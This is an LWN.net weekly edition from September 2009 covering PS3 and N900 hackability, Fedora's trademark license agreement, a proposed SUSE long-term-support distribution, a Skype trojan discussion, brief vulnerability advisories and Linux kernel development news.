LWN.net Weekly Edition for September 3, 2009
Hackable devices: one step forward, one step back
LWN has (like many others) long argued that device manufacturers should leave their products open to modification. Beyond being a simple gesture of respect for customers, hackability increases the value of the device and opens the way to no end of creativity; owners of such a device will often take it in directions that the vendor never dreamed of. We have recently seen a couple of announcements in this area which demonstrate contrasting views on hackability.On the down side, Sony recently announced a new set of PlayStation 3 systems, featuring more storage, a smaller box, and lower power consumption. This device also "features" the removal of the "install other OS" option. The "other OS" in question was invariably Linux. Users did not normally install Linux for its superior fragging experience; instead, Linux on the PS3 was most useful as an affordable way to gain access to - and hack with - the "Cell" processor architecture. Linux-running PS3 systems could be used to create low-end supercomputing systems and clusters or do any of a number of other interesting things. The locking-down of the newer PS3 models represents a real loss for the Linux community.
The reasoning for this change is said to be cost-cutting; Sony simply did not want to expend the resources to make the "install other OS" option work on the new system. A good chunk of that cost, it seems, is in the creation of a hypervisor under which secondary systems actually run; this hypervisor's reason for existence would appear to be to prevent other operating systems from making use of the 3D rendering engine. One would assume that the above-mentioned superior fragging experience offered by Linux (while legendary) would not be such a threat to Sony that it feels the need to wall off parts of its hardware, but that is evidently not the case. Evidently, the fear of high-performance nethack is enough to drive Linux off this platform entirely.
[PULL QUOTE: Evidently, the fear of high-performance nethack is enough to drive Linux off this platform entirely. END QUOTE] Sony can certainly build its hardware the way it wishes. But some of us might still wish that the company would look harder at where the raw materials for its products come from. Sony is, of course, a heavy user of embedded Linux; there is a whole range of Sony products with Linux inside. If you read books on a Sony reader, take pictures with a Sony camera, make movies with a Sony recorder, or watch movies on a Sony television, chances are that you're using Linux. Even the Sony WallStation Doorbell Adapter product uses Linux. It's interesting to wander through Sony's download page, where the company satisfies its GPL obligations, and see how many products are listed there.
Sony clearly is deriving great value from Linux. And that is great - that's what Linux is there for. And Sony is not absent from the contributor community; a quick look at kernel contributions since 2.6.26 shows 113 patches from Sony, putting the company just slightly ahead of LWN on the list. But surely Sony will find that Linux is a better platform for its products if it lets the development community play with those products. There are developers out there who (1) built the platform that Sony is using in its products, and (2) would love to help make those products run better. Frustrating those developers does not seem like a path toward long-term success with Linux.
The announcement of Nokia's N900 "mobile computer" shows a different approach. The N900 is a Maemo-based tablet, but, unlike its predecessors, it also functions as a telephone. It looks like a nice device, though, perhaps, a bit large for some pockets. Your editor is convinced that he must obtain one of these phones for review purposes; journalistic integrity demands it.
While the official propaganda attracted a fair amount of attention, many in the community were more struck by Quim Gil's posting on the subject. Cellular telephones are notoriously locked-down devices, but, it seems, the N900 will be different:
Nokia's path toward more open devices has been slow, but the company appears to really understand where its software comes from. Linux is not just a platform it can ship with its phones and avoid royalty charges; it's a living component which can be actively encouraged and helped to improve. If the N900 is successful, it will indeed encourage a new wave of developers who will help to make Linux better for all of us. And, in the process, they will make Maemo-based phones much better for Nokia.
What remains to be seen is how much of this openness remains when the N900 makes it to end users - especially those who buy their phones from their cellular carriers. Truly hackable devices may only be available to those who buy them through other channels, at full price. But the existence of that option is a major step in the right direction. Opening up the cellular carriers is a job for another year - and a lot more patience.
Here we have examples from two companies, both of which are known for making stylish, consumer-oriented devices. Both have chosen to base some of their products on Linux. One has moved in the direction of openness, providing full access to the device in the hope of energizing developers and taking market share from a dominant rival. The other has closed down a product, locking out interested developers, in the name of lowering prices. There is no doubt that the open approach is better for our community than the closed approach. Over the longer term, openness and support for the community really should prove to be better for business as well.
Fedora's trademark license agreement
While trademarks are often lumped together with copyrights and patents—under the poorly termed "intellectual property" umbrella—trademarks are quite different. One of those differences is that a trademark must be actively enforced, at least under US law, or the mark holder risks losing it. The Fedora community is currently discussing a license to allow community members to use the Fedora trademarks, while still protecting Red Hat's ability to defend the mark against those who would misuse it. But, requiring a signed license agreement in order for a community web site to use Fedora trademarks—on the site or in the domain name—seems heavy-handed to some.
Christoph Wickert brought up some concerns with the trademark license agreement (TLA) on the fedora-advisory-board mailing list. He was commenting on an earlier revision of the agreement, which has since been updated as a result of the conversation. One of the more controversial aspects of the agreement is that license termination requires that the domain registration be turned over to Red Hat:
The TLA allows either party to terminate the agreement
"for any reason at any time upon thirty (30) days prior notice in
writing to the other party
" in section 3(a), or, in section 3(c),
with no notice in the event of a legal claim against the site. Because of
the domain transfer requirement, Wickert was concerned that it could
lead to domain hijacking:
It should be noted that the TLA does not require that the contents of the website be handed over. Changes to the content may be required if the license is terminated in order to remove the trademarked items, but the contents would still be the property of the web site owner. Wickert's statement to that effect was simply a misunderstanding of the TLA.
Wickert also sees problems in the indemnification clause. By
indemnifying Red Hat against various claims, without any kind
of cap, he is worried that "a person could be bankrupt [for] the
rest of his life even if he didn't damage Red Hat or Fedora in any
way
". In the end, he concludes that the TLA is not something he can
recommend for others to sign, which is "a shame
".
Fedora project leader Paul Frields responded at length to Wickert's concerns, noting:
Another concern was the specific requirements for how the trademarks needed to be used and identified on a site covered by the TLA. Richard Körber complained that those requirements were too restrictive, leaving his site at risk because of minor violations:
Körber concluded that the barrier was just too high: "Frankly, I
would rather drop the domain or close down the entire site, before
I would sign the TLA
". Robert Scheck, who was asked to sign the
original TLA back in March, agreed with
Körber's conclusion. But, Luis Villa noted that, at some level, the existence of
the agreement doesn't change anything:
There is a larger issue as well. Dimitris Glezos worries about the barrier created by requiring a signed agreement:
Glezos argues that any miscreants are not going to sign the agreement
anyway, so requiring the TLA just makes it harder for those who want to
help spread Fedora. Part of the problem is that the TLA is a legal
document, so anyone considering signing it should either be very
comfortable with what it means, or, as was suggested in the thread, consult
a lawyer. That just creates an additional barrier as Wickert points out: "Is Red Hat really expecting their community members to
pay for a lawyer if they want to contribute? That would be
ridiculous.
"
Frields agrees: "If I
thought that this process required people to go get attorneys I'd
agree it's an utter failure.
" The underlying problem, though, is
the need for active enforcement of trademarks. By licensing community
members to use Fedora trademarks, Red Hat can still pursue other,
unlicensed users—some of whom may be using those marks in a way that
is detrimental to the project. Furthermore, engineers trying to solve
legal problems may not be the best approach, Frields said:
As it turns out, those bug reports did reach someone who can help: Pamela Chestek, a trademark attorney who works for Red Hat. She had a lengthy response to the various questions and problems that had been raised in the thread. Chestek started by trying to allay fears that there was a Red Hat agenda behind the TLA:
In addition, she went point by point through the issues that had been
raised. To start with, she explained the reasoning behind clause 3(a),
which allowed Red Hat to terminate the license at will, noting that it
allowed the Fedora community more flexibility should it decide to change
the Fedora name at some point. But, she said, "Because this has been so controversial, though,
we can forgo the flexibility and eliminate this basis for
termination
". The current version of the agreement now reflects
that change.
While Chestek's explanation of the domain transfer requirement still may not sit well with some, it does at least explain why it exists:
On the indemnification clause, Chestek explained that it was there to ensure
fairness for both sides. In any legal action that was brought against the
site for content or behavior that had nothing to do with Red Hat, the site
owner would be responsible, but "if the only reason you are in the
lawsuit is because you are using the Fedora trademark, Red Hat has to pay
the whole amount. That seems fair.
"
She also addressed the issue of
minor problems with how the trademarks were used on the site noting that
the wording requires a "material breach
" of the agreement.
Chestek pointed out that the trademark
guidelines were included by reference in the agreement, "but it would take a flagrant disregard for the Guidelines before
it would be considered a 'material' breach
". Even if that were to
happen, there is a cure provision that would give a site owner seven days
to address a problem that Red Hat notified them about.
Overall, Chestek covered the main legal (as opposed to philosophical) issues that were brought up. She clearly listened to the suggestions and complaints, and made changes where she thought it appropriate. The interaction displayed is very different than the sometimes lofty—and unapproachable—position that lawyers tend to occupy. By engaging the community in its normal communication forums, Chestek is well on the way to heading off some serious unhappiness amongst some in the community.
There may still be those who disagree with the TLA, philosophically or because of the language it contains, but, at the very least, everyone should understand the reasoning behind it. Free software projects using trademarks is controversial; we have seen Mozilla also wrestle with the problem and are likely to see other projects do so in the future. It is in a project's best interest to ensure that something called Fedora (or Firefox) is, indeed, the "real McCoy" and not some malware-afflicted knock-off. How exactly that is done will likely evolve over time. Villa sees some hope in the distance:
Various projects have different ways of approaching the trademark issue. Mozilla has a trademark policy that does not require a signed agreement for using its trademarks on a web site, but does have a license [PDF] for using the trademarks in domain names. That license has much of the same content as the Fedora TLA, including transferring the domain if the license is terminated. Other projects, like Linux, have a different strategy: sublicensing the mark for use in other trademarks, but considering most other uses to be "fair use"—though still subject to proper trademark attribution.
Because trademarks have to be actively, and not selectively, enforced, there needs to be a clear delineation as to what is allowed, and what isn't. Whether it truly requires a signed license agreement is an open question, but clearly Red Hat lawyers think it is safer to do things that way. One alternative is for the mark holder to disallow any use by third parties—a much worse outcome.
While it may be distasteful to have to sign some kind of agreement, it may also be the only workable solution that will satisfy Red Hat, which, after all, does own the trademarks. It will be interesting to see how other projects—particularly those backed by a large company—handle the trademark issue down the road.
Toward a long-term SUSE-based distribution
A group of SUSE Linux users put plans in motion last week to create a free, community-managed server distribution that maintains compatibility with Novell's enterprise offerings, but guarantees the long-term-support not provided by openSUSE. The result, said organizers, would be similar to the relationship between CentOS and Red Hat Enterprise Linux (RHEL), and would ultimately be beneficial to Novell. There are numerous practical difficulties to be overcome in the creation of this distribution, though, and the form that this distribution might take is not yet clear.
The idea of a free SUSE-based Linux distribution suitable for server use has cropped up more than once in the past; what spurred action this time was the August 14th announcement that openSUSE was moving from a 24-month to an 18-month maintenance period. Boyd Lynn Gerber, a consultant who works with the SUSE Linux Enterprise Server (SLES) and Desktop (SLED) products and participates in the openSUSE project, voiced concern over the change, especially for small-to-medium sized businesses (SMBs) without the financial resources to purchase SLES and SLED support contracts (which start at $799 and $120 per year, respectively). For comparison, SLES and SLED receive general updates for five years, and security patches for seven.
Gerber argued that shortening the supported lifespan of openSUSE widened the gap in the product line between openSUSE and SLES/SLED, potentially making it hard for small businesses to smoothly transition into the enterprise line. He proposed starting a group to work on a distribution in between openSUSE and SLES/SLED — one that would be available without purchasing a support contract from Novell, but would offer a longer, multi-year lifespan with which businesses would be comfortable, in particular guaranteeing backports for critical patches and security fixes.
Multiple options
Gerber's initial plan suggested three possible courses of action: create a support structure to maintain openSUSE backports for a longer period of time (a.k.a. the "OpenSUSE LTS" option), create a new distribution built from the source code releases of SLES but with Novell's trademarks removed (the "OpenSLES" option), or create a new distribution using the latter model, but for SLED instead of SLES (the "OpenSLED" option). The subsequent discussion on the opensuse-project mailing list debated the merits of each alternative, but the level of response also led Gerber to start a separate mailing list on which to further pursue the idea.
The OpenSLED option was quickly dismissed, because the product would be too similar to openSUSE itself, and because SLED does not include any server-oriented packages, so it would do little to meet additional needs for SMBs. Between the OpenSUSE LTS and OpenSLES options, opinion on the new list was evenly split. The pros of OpenSUSE LTS include the relative legal simplicity — creating a derivative of openSUSE does not require permission or even cooperation from Novell — but the cons include significantly higher investment of volunteer time. openSUSE contains more packages than either SLES or SLED, so more patches and backports would be required to maintain it over time.
Furthermore, adding LTS to openSUSE would require creating a framework for triaging, testing, and approving updates and backports well after an openSUSE release's end-of-life, whereas mimicking SLES's lifespan for an OpenSLES distribution could rely on Novell's tested patches. The down side of running an OpenSLES distribution, according to list traffic, is the risk of alienating or angering Novell if the company perceives the effort as siphoning away SLES customers. Gerber and others countered that an OpenSLES would, in reality, attract more customers to SLES by providing a lower barrier to entry, particularly for SMBs.
Supporters of the OpenSLES option compare it to CentOS, which they describe as a popular choice among SMBs either with smaller budgets or merely testing the waters before signing up for enterprise support with RHEL. CentOS, the "Community ENTerprise Operating System" is volunteer-driven, and since 2003 has built its releases from Red Hat's publicly available RHEL source code packages, with Red Hat's trademarks and branding excised. RHEL, like SLES and SLED, has a seven-year support life cycle.
Progress
Thus far, said Gerber, Novell has given the idea a chilly public
reception, although he claims that in private conversation members of
Novell management have been more open and expressed the view that an
OpenSLES could be a tool to gain more SLES customers. "We will need
to show or demonstrate to Novell and their upper management that this a
good thing to support
", he said.
Gerber believes that the OpenSLES option is clearly better than the OpenSUSE LTS option, and has started planning, laying down the groundwork for a non-profit entity to oversee the project, creating initial project guidelines based on the examples provided by CentOS and other derivative distributions, and looking for legal representation to assist with licensing and trademark usage concerns. Just a handful of people participated in the discussion on opensuse-project, but a dozen or so have already joined the new mailing list, and Gerber said the discussion is ongoing in the #opensuse-server IRC channel on Freenode.
Novell did not respond to requests for comment about the project, although SLES manager Gerald Pfeifer did ask several questions about the proposal on the opensuse-project list, particularly about the suggestion that Novell was not properly serving the SMB market.
Although SUSE Linux does not have an ecosystem of derivative distributions like those surrounding Red Hat's products or Debian, there does not appear to be anything preventing such spin-offs from starting up. openSUSE has detailed trademark guidelines [PDF] explicitly covering redistribution and modification projects. SLES and SLED are not covered by that set of guidelines, but Novell has a trademark usage request system through which interested parties can ask for trademark usage approval on a case-by-case basis. As for the software itself, openSUSE is of course a fully open project, and Novell provides source code packages for SLES and SLED on its web site.
Clearly SUSE users and resellers are interested in the possibility of a free alternative to Novell's current enterprise offerings. There are no hard numbers to back up the position that CentOS has directly increased Red Hat's sales of RHEL, but the company certainly tolerates its existence, and CentOS as well several other highly-focused RHEL derivatives like Scientific Linux have continued to thrive. Proposals to build a long-term-support option for existing distributions are no guarantee of success; several efforts to add that support to Fedora have come and gone in recent years. If it is successful, creating an OpenSLES may be the first step not only towards filling the long-term-support gap, but to expanding the SUSE-based distribution family.
Good news / bad news
It has been a while since the last LWN update. So here are a couple of items of LWN metadata.On the "good news" side, we've finally managed to implement an often-requested feature: per-article RSS feeds for readers who want to follow the comments on a specific article in their RSS reader. The feed URL appears in the metadata headers for each article and comment, so subscribing to an article-specific feed should be a matter of a simple mouse click for most readers.
Of course, the unread comments page remains the best way to follow conversations on LWN, in your editor's humble opinion.
The not-so-good news is this: while LWN has held up reasonably well through this whole "economic crisis" thing, the simple fact is that its effects are being felt here. Some subscribers are not renewing, and others are moving to lower subscription levels. Costs have also increased - for example, our credit card bank evidently was unhappy with the size of its government bailout, so it raised credit card processing rates considerably. We are told that health insurance will be increasing 20-30% in a few months. Needless to say, these things are putting a squeeze on the budget.
What it comes down to is that something will have to change for LWN to continue operating. We very much intend to continue, so we're considering all of the options available to us. Since we're evidently not seen as being too big to fail, those options are generally unpleasant; they include price increases and/or staff reductions. No decisions have been made, but, one way or another, LWN readers are likely to see some changes as we get this operation back onto an even keel.
Thanks, as always, for supporting LWN.
Security
A trojan for Skype
A recent report about a Skype trojan that could extract voice calls as mp3 files and ship them off to other locations led to an interesting discussion on the Fedora users mailing list. The trojan itself is somewhat unsurprising as there have been persistent rumors about wiretapping back doors in Skype for some time. The trojan is Windows-only, but it does come with most of the source code, which makes it interesting to those who study malware. While not a direct threat to Linux users, it does highlight a number of privacy and security issues to ponder.
Skype is a popular voice over IP (VoIP) application that runs on Linux, Mac OS X, and Windows. Part of its appeal is that there are many users of the free (as in beer) software, so folks can make free phone calls to many of their friends and family. But it is a closed source tool that resists attempts to reverse-engineer its protocol, so there are no interoperable free (as in freedom) equivalents.
Daniel B. Thurman brought up the trojan and wondered if it was an example of the back doors or interception facilities that governments have long been rumored to be pushing for Skype. That set off a thread in which "black helicopters" made a tongue-in-cheek appearance, but there were also more serious postings. Marko Vojinovic asks about whether there are ongoing attempts to reverse-engineer the Skype protocol:
There are a number of problems with that, as was pointed out, including
the likelihood that Skype would change the protocol to cripple
interoperability, much as instant messaging companies have done along the
way. Roberto Ragusa noted that there have
been people who looked at Skype, but they "found that it contains
tons and tons of cryptography, obfuscation and countermeasures against
debugging or reverse engineering.
" That is of concern he said
because one cannot be sure of exactly what it's doing: "A closed
source code like that and with an explicit purpose to build a crypted P2P
network bypassing firewalls with every trick possible is something to be
nervous about.
"
Alan Cox had some additional thoughts
on reverse-engineering the code: "The person who completely reverse
engineers skype probably destroys it. If you can write a skype client [then]
the spammers can write skype spam tools as well.
" He also mentions
the "mostly circumstantial
" evidence that law enforcement has
added intercept facilities to Skype itself. Furthermore, anyone who might
be working on the problem has good reason to do it quietly, he said:
So, we have a closed source application, which uses malware-like techniques to obfuscate its functioning, and folks willingly run it on their computers. In some ways, that's no different than any other closed source application, but there are a few differences. Skype, by its very nature, must use the network to send encrypted data to multiple untrusted machines elsewhere. While it may not be compromised by governmental authorities in the standard binary, it is a known target of those entities, and this trojan demonstrates a way that it might be compromised. Overall, it would seem there are a few risks to both security and privacy from that kind of application—more so than a closed source word processor or non-networked game.
Free software solutions, like Ekiga, may be able to overcome some of the shortcomings of Skype. But, if those solutions become popular, they are likely to run afoul of the spammers and scammers that Cox warns about. It's likely to be true of regular and cellular phone service as well, but a warning from "Tim" in the thread is worth repeating:
While Skype provides a nice service—without charge in many cases—it does present a bit of a privacy headache. If it can be subverted for wiretapping purposes, it can undoubtedly be subverted for other reasons. Some of those could present security headaches as well. Since we don't really know what the Skype code does when it isn't infected, it will be difficult to determine if its behavior changes in a malicious way. That should be a little worrisome.
Brief items
What the Internet knows about you
A new site at whattheinternetknowsaboutyou.com is an interesting demonstration of CSS-related browser history disclosure vulnerabilities. This site is able to produce a surprisingly comprehensive list of sites that one has visited, down to the level of specific pages on social networking sites and such. No JavaScript required. There's also information on just how the site works and how the disclosure of information can be minimized. "It is a source of amazement to us that such an obvious and well-documented history sniffing channel has been allowed to exist for so many years. We cannot help but wonder why, despite all the malicious potential, such a hole has not yet been closed."
Illustrating the Linux sock_sendpage() NULL pointer dereference
Ramon de Carvalho Valle has released an exploit for the Linux sock_sendpage null pointer dereference vulnerability. The exploit was originally written to determine whether it was exploitable on the Power/Cell architecture, but was later expanded for i386 and x86_64. Many distribution kernels were tested using the exploit, and the results are included in the report to the bugtraq mailing list. The code may be of general interest, but also could be used on other kernels to determine if the problem has been addressed. Click below for the full report along with a link to the code.Apache.org compromised
The Apache project has suffered a server compromise which took the site off the net for some hours. "To the best of our knowledge at this time, no end users were affected by this incident, and the attackers were not able to escalate their privileges on any machines. While we have no evidence that downloads were affected, users are always advised to check digital signatures where provided."
New vulnerabilities
dnsmasq: heap overflow, NULL pointer dereference
| Package(s): | dnsmasq | CVE #(s): | CVE-2009-2957 CVE-2009-2958 | ||||||||||||||||||||||||||||||||
| Created: | September 1, 2009 | Updated: | October 14, 2009 | ||||||||||||||||||||||||||||||||
| Description: | From the Red Hat advisory:
Core Security Technologies discovered a heap overflow flaw in dnsmasq when the TFTP service is enabled (the "--enable-tftp" command line option, or by enabling "enable-tftp" in "/etc/dnsmasq.conf"). If the configured tftp-root is sufficiently long, and a remote user sends a request that sends a long file name, dnsmasq could crash or, possibly, execute arbitrary code with the privileges of the dnsmasq service (usually the unprivileged "nobody" user). (CVE-2009-2957) A NULL pointer dereference flaw was discovered in dnsmasq when the TFTP service is enabled. This flaw could allow a malicious TFTP client to crash the dnsmasq service. (CVE-2009-2958) | ||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||
gfs2-utils: temporary file vulnerabilities
| Package(s): | gfs2-utils | CVE #(s): | CVE-2008-6552 | ||||||||||||||||||||||||||||||||||||
| Created: | September 2, 2009 | Updated: | February 16, 2011 | ||||||||||||||||||||||||||||||||||||
| Description: | The gfs2-utils package suffers from multiple temporary file vulnerabilities which could be exploited by a local hacker to overwrite arbitrary files. | ||||||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||||||
htmldoc: stack-based buffer overflow
| Package(s): | htmldoc | CVE #(s): | |||||||||
| Created: | September 1, 2009 | Updated: | September 2, 2009 | ||||||||
| Description: | From the Red Hat bugzilla: A stack-based buffer overflow by processing user-supplied input was found in HTMLDOC's routine, used to set the result page output size for custom page sizes. A remote attacker could provide a specially-crafted HTML file, which once opened by an unsuspecting user, would lead to denial of service (htmldoc crash). | ||||||||||
| Alerts: |
| ||||||||||
ikiwiki: information disclosure
| Package(s): | ikiwiki | CVE #(s): | CVE-2009-2944 | ||||||||||||
| Created: | September 1, 2009 | Updated: | April 1, 2010 | ||||||||||||
| Description: | From the Debian advisory: Josh Triplett discovered that the blacklist for potentially harmful TeX code of the teximg module of the Ikiwiki wiki compiler was incomplete, resulting in information disclosure. | ||||||||||||||
| Alerts: |
| ||||||||||||||
kernel: denial of service
| Package(s): | kernel | CVE #(s): | CVE-2009-2691 | ||||||||||||||||
| Created: | August 27, 2009 | Updated: | March 23, 2010 | ||||||||||||||||
| Description: | From the National Vulnerability Database
entry:
"The mm_for_maps function in fs/proc/base.c in the Linux kernel 2.6.30.4 and earlier allows local users to read (1) maps and (2) smaps files under proc/ via vectors related to ELF loading, a setuid process, and a race condition." | ||||||||||||||||||
| Alerts: |
| ||||||||||||||||||
kernel: denial of service
| Package(s): | kernel | CVE #(s): | CVE-2009-2767 | ||||||||
| Created: | August 27, 2009 | Updated: | October 22, 2009 | ||||||||
| Description: | From the National Vulnerability Database
entry:
"The init_posix_timers function in kernel/posix-timers.c in the Linux kernel before 2.6.31-rc6 allows local users to cause a denial of service (OOPS) or possibly gain privileges via a CLOCK_MONOTONIC_RAW clock_nanosleep call that triggers a NULL pointer dereference." | ||||||||||
| Alerts: |
| ||||||||||
libmikmod: two denial of service vulnerabilities
| Package(s): | libmikmod | CVE #(s): | CVE-2007-6720 CVE-2009-0179 | ||||||||||||||||||||||||||||||||||||
| Created: | August 31, 2009 | Updated: | October 11, 2010 | ||||||||||||||||||||||||||||||||||||
| Description: | From the Red Hat bugzilla entries [1 and 2]: CVE-2009-0179: A denial of service flaw was found in the MikMod player, used for playing MOD files. If an attacker would trick the mikmod user to load an XM file, this could lead to denial of service (application crash). CVE-2007-6720: A denial of service flaw was found in the MikMod player, used for playing MOD files. If an attacker would trick the mikmod user to play multiple MOD using files with varying number of channels, this could lead to denial of service (application crash or abort). | ||||||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||||||
mono: cross-site scripting vulnerabilities
| Package(s): | mono | CVE #(s): | CVE-2008-3422 | ||||||||||||
| Created: | August 27, 2009 | Updated: | December 7, 2009 | ||||||||||||
| Description: | From the National Vulnerability Database
entry:
"Multiple cross-site scripting (XSS) vulnerabilities in the ASP.net class libraries in Mono 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via crafted attributes related to (1) HtmlControl.cs (PreProcessRelativeReference), (2) HtmlForm.cs (RenderAttributes), (3) HtmlInputButton (RenderAttributes), (4) HtmlInputRadioButton (RenderAttributes), and (5) HtmlSelect (RenderChildren)." | ||||||||||||||
| Alerts: |
| ||||||||||||||
openssh: information disclosure
| Package(s): | openssh | CVE #(s): | CVE-2008-5161 | ||||||||||||||||
| Created: | September 2, 2009 | Updated: | March 8, 2010 | ||||||||||||||||
| Description: | Openssh is vulnerable to a specific man-in-the-middle attack which could be able to obtain a piece of plain text when the CBC cipher mode is used. | ||||||||||||||||||
| Alerts: |
| ||||||||||||||||||
squirrelmail: cross-site request forgery
| Package(s): | squirrelmail | CVE #(s): | CVE-2009-2964 | ||||||||||||||||
| Created: | August 31, 2009 | Updated: | August 13, 2010 | ||||||||||||||||
| Description: | From the Mandriva advisory: All form submissions (send message, change preferences, etc.) in SquirrelMail were previously subject to cross-site request forgery (CSRF), wherein data could be sent to them from an offsite location, which could allow an attacker to inject malicious content into user preferences or possibly send emails without user consent (CVE-2009-2964). | ||||||||||||||||||
| Alerts: |
| ||||||||||||||||||
wordpress: open redirect vulnerability
| Package(s): | wordpress | CVE #(s): | CVE-2008-6762 | ||||
| Created: | August 27, 2009 | Updated: | September 2, 2009 | ||||
| Description: | From the National Vulnerability Database
entry:
"Open redirect vulnerability in wp-admin/upgrade.php in WordPress, probably 2.6.x, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the backto parameter." | ||||||
| Alerts: |
| ||||||
wordpress: denial of service
| Package(s): | wordpress | CVE #(s): | CVE-2008-6767 | ||||
| Created: | August 27, 2009 | Updated: | September 2, 2009 | ||||
| Description: | From the National Vulnerability Database
entry:
"wp-admin/upgrade.php in WordPress, probably 2.6.x, allows remote attackers to upgrade the application, and possibly cause a denial of service (application outage), via a direct request." | ||||||
| Alerts: |
| ||||||
wordpress: password vulnerability
| Package(s): | wordpress | CVE #(s): | CVE-2008-4106 | ||||
| Created: | August 27, 2009 | Updated: | September 2, 2009 | ||||
| Description: | From the National Vulnerability Database
entry:
"WordPress before 2.6.2 does not properly handle MySQL warnings about insertion of username strings that exceed the maximum column width of the user_login column, and does not properly handle space characters when comparing usernames, which allows remote attackers to change an arbitrary user's password to a random value by registering a similar username and then requesting a password reset, related to a "SQL column truncation vulnerability."" | ||||||
| Alerts: |
| ||||||
wordpress: directory traversal vulnerability
| Package(s): | wordpress | CVE #(s): | CVE-2008-4769 | ||||
| Created: | August 27, 2009 | Updated: | September 2, 2009 | ||||
| Description: | From the National Vulnerability Database
entry:
"Directory traversal vulnerability in the get_category_template function in wp-includes/theme.php in WordPress 2.3.3 and earlier, and 2.5, allows remote attackers to include and possibly execute arbitrary PHP files via the cat parameter in index.php. NOTE: some of these details are obtained from third party information." | ||||||
| Alerts: |
| ||||||
wordpress: cross-site request forgery vulnerability
| Package(s): | wordpress | CVE #(s): | CVE-2008-5113 | ||||
| Created: | August 27, 2009 | Updated: | September 2, 2009 | ||||
| Description: | From the National Vulnerability Database
entry:
"WordPress 2.6.3 relies on the REQUEST superglobal array in certain dangerous situations, which makes it easier for remote attackers to conduct delayed and persistent cross-site request forgery (CSRF) attacks via crafted cookies, as demonstrated by attacks that (1) delete user accounts or (2) cause a denial of service (loss of application access). NOTE: this issue relies on the presence of an independent vulnerability that allows cookie injection." | ||||||
| Alerts: |
| ||||||
Page editor: Jake Edge
Kernel development
Brief items
Kernel release status
The current development kernel is 2.6.31-rc8, released on August 27. "This should be the last -rc, and it's really been quieting down. There's 131 commits there, and it's all pretty trivial." He predicts the final 2.6.31 release will happen on Labor Day (September 7).
There have been no stable updates in the last week, and none are in the review process as of this writing.
Kernel development news
Quotes of the week
Is it *necessary*? In a world where hardware is perfect, no. In a world where people don't bother buying ECC memory because it's 10% more expensive, and PC builders use the cheapest possible parts --- I think it's a really good idea.
I do hope others see what has happened here, and seriously consider whether they want to get involved in a sniping dictatorial community. Maybe considering to go down the BSD route instead.
In brief
CFS hard limits. The Linux "completely fair scheduler" works by dividing the available CPU time between the processes contending for it. In many situations, though, processes running on the system will not actually use their full fair share; they may spend enough time waiting for I/O, for example, that they simply cannot run enough to use all of the time they are entitled to. In such situations, CFS will give the left-over time to more CPU-intensive processes that can make good use of it, even if those processes have exceeded their allocation.That is normally the right thing to do; better to put the CPU time to good use than to have the processor go idle while processes want to run. But there are, it seems, situations where system administrators would rather not hand out excess CPU time in that way. If, for example, the processes belong to a customer who is paying for a certain amount of processing time, giving away more could be bad business. To keep this from happening, Bharata B Rao has created the CFS hard limits patch set. Hard limits are managed using control groups; they allow the administrator to set an absolute limit on the amount of CPU time the control group as a whole is able to use over a given period of real time. Billing users who want their limit raised is, of course, a user-space policy issue, so it's not part of this patch.
Discard again. The "discard" operation, which informs a block storage device that specific blocks are no longer in use, should help a wide variety of storage technologies - including solid-state devices and "thin provisioned" arrays - to perform better. But discard, itself, has some performance issues; see the trouble with discard for details.
Christoph Hellwig is trying to improve discard performance with a new set of patches, some of which originally come from Matthew Wilcox. These changes allow discard requests to cover much larger sections of the storage device; previously they had been limited by the maximum request size for the device. When combined with the XFS-specific XFS_IOC_TRIM ioctl() command, this change allows user-space to issue bulk discard operations for all of the free portions of a filesystem partition at an opportune time. The patches also add better control over whether any specific discard request should be seen as a queue barrier and whether it should be performed as a blocking operation.
Upcoming network driver API change. Not content with having reworked the network driver API once (by moving operations into their own structure), Stephen Hemminger now has a new patch set which changes the API implemented by all drivers. The function involved is ndo_start_xmit(), which is used by the networking layer to pass a packet to the driver for transmission. This function should really only return one of two values: NETDEV_TX_OK (meaning that the packet has been accepted and queued for transmission) or NETDEV_TX_BUSY (the packet was not accepted because the queue was full or some similar problem came up). Drivers using the deprecated LLTX mode can also return NETDE_TX_LOCKED to indicate that the transmit lock was already taken.
The problem is that the return type for ndo_start_xmit() was defined as int; some driver writers thought that meant they could return arbitrary error codes to the networking layer. With Stephen's patch, the return type becomes netdev_tx_t, an enum containing only the defined return codes. That should catch any driver writers who try to return the wrong thing - but at the cost of changing a lot of drivers.
Checkpoint/restore wiki. There is a new wiki dedicated to the collection of information about the rapidly-developing checkpoint/restore functionality. It's a little bare at the moment, but, one assumes, it will soon be filled with information about this feature.
The actual checkpoint/restore task remains an exercise in complexity. As an example, consider one of the most recently-posted pieces: checkpoint and restore for security credentials. It requires a number of hooks into LSM modules to obtain the current security state, serialize it, and to restore it at some future time. It can all probably be made to work, but long-term maintenance could prove to be painful.
The BFS scheduler. Con Kolivas, who worked on desktop interactivity issues in the past before abruptly leaving the kernel development community in 2007, has posted a new scheduler called BFS. Con Says:
(See the original LWN posting for the associated comment thread.)
O_*SYNC
When developers think about forcing data written to files to be flushed to the underlying storage device, they tend to think about the fsync() system call. But it is also possible to request synchronous behavior for all operations on a file descriptor, either at open() time or using fcntl(). Support in Linux for synchronous I/O flags is likely to improve in 2.6.32, but this work has raised a couple of interesting issues with regard to the current implementation and forward compatibility.There are three standard-defined flags which can be used to specify synchronous I/O behavior:
- O_SYNC: requires that any write operations block until all
data and all metadata have been written to persistent storage.
- O_DSYNC: like O_SYNC, except that there is no
requirement to wait for any metadata changes which are not necessary
to read the just-written data. In practice, O_DSYNC means
that the application does not need to wait until ancillary information
(the file modification time, for example) has been written to disk.
Using O_DSYNC instead of O_SYNC can often eliminate
the need to flush the file inode on a write.
- O_RSYNC: this flag, which only affects read operations, must be used in combination with either O_SYNC or O_DSYNC. It will cause a read() call to block until the data (and maybe metadata) being read has been flushed to disk (if necessary). This flag thus gives the kernel the option of delaying the flushing of data to disk; any number of writes can happen, but data need not be flushed until the application reads it back.
O_DSYNC and O_RSYNC are not new; they were added to the relevant standards well over ten years ago. But Linux has never really supported them (they are optional features), so glibc simply defines them both to be the same as O_SYNC.
